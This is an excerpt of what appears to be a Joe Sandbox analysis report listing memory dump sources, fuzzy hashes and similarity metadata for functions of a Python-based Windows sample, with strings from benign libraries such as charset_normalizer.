                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: O_clear_flagsO_set_flags
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3946675294-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: abd56ec179e8dc511f12abdbc92a8f9a103b85c798d31762858c552181ab4736
                                                                                                                                                                                                                                                                          • Instruction ID: c4e67fb93a63423f5d3824511d3171f1a6b3cb0defb1288abaac2439370da96b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abd56ec179e8dc511f12abdbc92a8f9a103b85c798d31762858c552181ab4736
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF0A7A1F452424AFF555B19D8943BC15C0DB84B88F186035CD0C5FBD6DEBE94C68780
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                          • String ID: feed
                                                                                                                                                                                                                                                                          • API String ID: 1069087923-591414443
                                                                                                                                                                                                                                                                          • Opcode ID: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
                                                                                                                                                                                                                                                                          • Instruction ID: be8ac1312ef54ba8401210f96b60c2187263f550b9ee6e58268853115ef5e90e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F0FE65E0960691FB756BA1E85427C23A0AF48B98F0C5433CD1D4AB75FEBEE1458740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-604167972
                                                                                                                                                                                                                                                                          • Opcode ID: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
                                                                                                                                                                                                                                                                          • Instruction ID: 7c5d6d387500f301f0d81ab3ef42a7031fbbdc0454daa185e66db93b130aa16c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0E2A0F09902C1D9248B28D89003C2361BB44B68F9C5233C91C82AB0FEAEE59A8300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                          • String ID: reset
                                                                                                                                                                                                                                                                          • API String ID: 1069087923-1352515405
                                                                                                                                                                                                                                                                          • Opcode ID: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                                                                          • Instruction ID: b23b295bba2ace6d2be3045d4172611331564a9cd7d3f26c5254e0707eacb757
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BF0FE65E0960691FB356B61A85417C13A0AF48B98F0C5433C90D46BB5FEBEE1458740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArchaicUpperLowerPlugin' object attribute '_current_ascii_only' cannot be deleted$bool
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-1261582747
                                                                                                                                                                                                                                                                          • Opcode ID: 8c7019ae60389a316b38f34d8583e21c126b8065cf809baa2539fb2ca883be19
                                                                                                                                                                                                                                                                          • Instruction ID: 9b261844e8ec840b0935a7f294af1ea117341235962dc8ad6615b4be4ef6e55b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c7019ae60389a316b38f34d8583e21c126b8065cf809baa2539fb2ca883be19
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F082A1F1590291D9249729C89003C2761BB55BA8FEC4633D51CC2BB0FEAEE49AC300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_frenzy_symbol_in_word' cannot be deleted$bool
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-825057536
                                                                                                                                                                                                                                                                          • Opcode ID: 7687b87dcfade708e71cb8af8033597d5e5aa7a4328c8a6f7437823f4d63887e
                                                                                                                                                                                                                                                                          • Instruction ID: 388a81bbc4f3074ba26b21150f25a589bbea936d599114fb0d1f264978168423
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7687b87dcfade708e71cb8af8033597d5e5aa7a4328c8a6f7437823f4d63887e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2F082A1F16902D1D9649B29D89002C2361BB54B78FAD5673C51C82BB1FEEEE49AC300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                          • String ID: eligible
                                                                                                                                                                                                                                                                          • API String ID: 1069087923-1278981203
                                                                                                                                                                                                                                                                          • Opcode ID: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
                                                                                                                                                                                                                                                                          • Instruction ID: 0555ff49ac8614ea20f16b0de05836d1e61e6accf276785dd12a584f7905a32e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F0FE65E0960691FF346B62A85817C13A0AF48B9CF0C6433C90D46B75FEBEE0818700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-2595685569
                                                                                                                                                                                                                                                                          • Opcode ID: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
                                                                                                                                                                                                                                                                          • Instruction ID: c34761580a87ebdfc4d02b416a641e5338cb12bb11b4d4e5aabae863f6b2a9e5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF082A5F19902D1DD249729C89003C2360BB54B68FED4633C51CC2BB0FEAEE59AC300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                                                                          • String ID: ratio
                                                                                                                                                                                                                                                                          • API String ID: 1069087923-4234197119
                                                                                                                                                                                                                                                                          • Opcode ID: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
                                                                                                                                                                                                                                                                          • Instruction ID: dd1ee73b420e0fabd0d1426cda90e68f5738cc0ad0a817fcfe35184c23eb73da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FF0DA64E0961691FA35AF65E81427D23A0AF49B9CF0C9533C90D46BB5FEBEA4818740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Err_String
                                                                                                                                                                                                                                                                          • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
                                                                                                                                                                                                                                                                          • API String ID: 1450464846-232606992
                                                                                                                                                                                                                                                                          • Opcode ID: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
                                                                                                                                                                                                                                                                          • Instruction ID: 573710dedd24d2c114d15cceb4ed4fd25965649409b415883a58dcf9b8733944
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F082A5F09A0291DE649B29D89002C2361BB54B68F9C4673D51C82BB0FEAEE59AC300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596106431.00007FFEDCBA1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFEDCBA0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596079579.00007FFEDCBA0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596266920.00007FFEDCCFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596342688.00007FFEDCCFF000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcba0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                                                          • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                                                          • Opcode ID: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                                                                          • Instruction ID: acba6128860b7f0cb0eb8078ee8a5f3a4eabe5c491109e2a23d11bbdb5e51c1c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE03921B49A9181EA148B5AB64846D6660AB98FC4B0C9132EE4E5BF29EF6CE543C740
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFEDCD12533), ref: 00007FFEDCD125C6
                                                                                                                                                                                                                                                                          • PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFEDCD12533), ref: 00007FFEDCD125F8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Object_$Track
                                                                                                                                                                                                                                                                          • String ID: 3.2.0
                                                                                                                                                                                                                                                                          • API String ID: 16854473-1786766648
                                                                                                                                                                                                                                                                          • Opcode ID: f91d149df4c654f8be0df0ef2da4b36c9d06b56ee9d54162962ccaca08fa2000
                                                                                                                                                                                                                                                                          • Instruction ID: cb4c79129554c664e532d2145abd0e6a8dd8b32cb93758dabfe2bef1645e05f2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f91d149df4c654f8be0df0ef2da4b36c9d06b56ee9d54162962ccaca08fa2000
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0E564B99B0691EE168B59EC4406C33A4AF09B94B5C0137CD4D027B4FF3DE1A6C244
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596106431.00007FFEDCBA1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFEDCBA0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596079579.00007FFEDCBA0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596266920.00007FFEDCCFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596342688.00007FFEDCCFF000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcba0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                                                                          • Opcode ID: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                                                                          • Instruction ID: d476c50178e5b35f44b0ae3ca09d371dfdd35a24da44ec051d4450035c75cc88
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A91E432A4A65682EA24CF19950077E76A8FB44FD0F084936EF4D47FA5CF3CD4528B44